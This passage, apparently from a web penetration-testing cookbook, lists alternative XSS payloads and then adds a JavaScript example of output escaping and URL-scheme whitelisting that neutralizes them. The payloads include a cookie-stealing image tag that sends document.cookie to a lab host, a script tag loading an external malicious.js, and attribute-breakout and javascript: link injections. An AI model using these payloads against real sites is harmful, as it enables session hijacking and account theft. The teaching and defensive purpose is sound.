See also

In this recipe, we used the <script> tag to inject a JavaScript code block into the page; however, this is not the only HTML tag we can use, especially with the additions made by HTML5, where we have <video> and <audio>, for example. Let's see some other payloads we could have used to exploit XSS:

  • Generating an error event on tags with an src/source parameter, such as <img>, <audio>, and <video>:
<img src=X onerror="javascript:document.write('<img src=&quot;http://192.168.56.10:88/img'+document.cookie+'&quot;>')">

Or, use the following:

<audio><source onerror="javascript:alert('XSS')">

Or, there is also this:

<video><source onerror="javascript:alert('XSS')">

  • Injecting a <script> tag that loads an external JavaScript file:
<script src="http://192.168.56.10:88/malicious.js">

  • If the injected text is set as a value inside an HTML tag and surrounded by quotes ("), as in <input value="injectable_text">, we can close the quotes and add an event handler to the tag. For example, replace injectable_text with the following code. Notice that the last quote is left unclosed, so the closing quote already present in the HTML code completes the attribute:
" onmouseover="javascript:alert('XSS')

  • Injecting a link or other tag with the href property to make it execute code whenever it is clicked:
<a href="javascript:alert('XSS')">Click here</a>

There are a multitude of variations of tags, encodings, and instructions that can be used to exploit an XSS vulnerability. For a more complete reference, see the OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
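
The payloads in this list land in three different output contexts: element content, a quoted attribute value, and a URL attribute such as href. The following is an added example, not code from the book, showing the output encoding that neutralizes each of them; the function names and the placeholder base URL are assumptions made for the illustration.

```javascript
// Added example, not from the book. Function names are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Element content and quoted attribute values: encode the characters that
// can open a tag or close the surrounding quotes.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// href/src values: encoding does not stop javascript: URLs, so parse the
// value the way a browser does and allow only known schemes.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
const BASE = 'https://placeholder.invalid/'; // assumed base for relative URLs

function safeUrl(url) {
  try {
    const scheme = new URL(String(url), BASE).protocol;
    return ALLOWED_SCHEMES.has(scheme) ? String(url) : '#';
  } catch (err) {
    return '#'; // unparseable input is rejected
  }
}

function renderComment(text) { return `<p>${escapeHtml(text)}</p>`; }
function renderInput(value) { return `<input value="${escapeHtml(value)}">`; }
function renderLink(href, label) {
  return `<a href="${escapeHtml(safeUrl(href))}">${escapeHtml(label)}</a>`;
}

// Inputs copied from the payload list above.
console.log(renderComment(`<audio><source onerror="javascript:alert('XSS')">`));
console.log(renderInput(`" onmouseover="javascript:alert('XSS')`));
console.log(renderLink(`javascript:alert('XSS')`, 'Click here'));
console.log(renderLink('/account?tab=1&lang=en', 'Account'));
```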
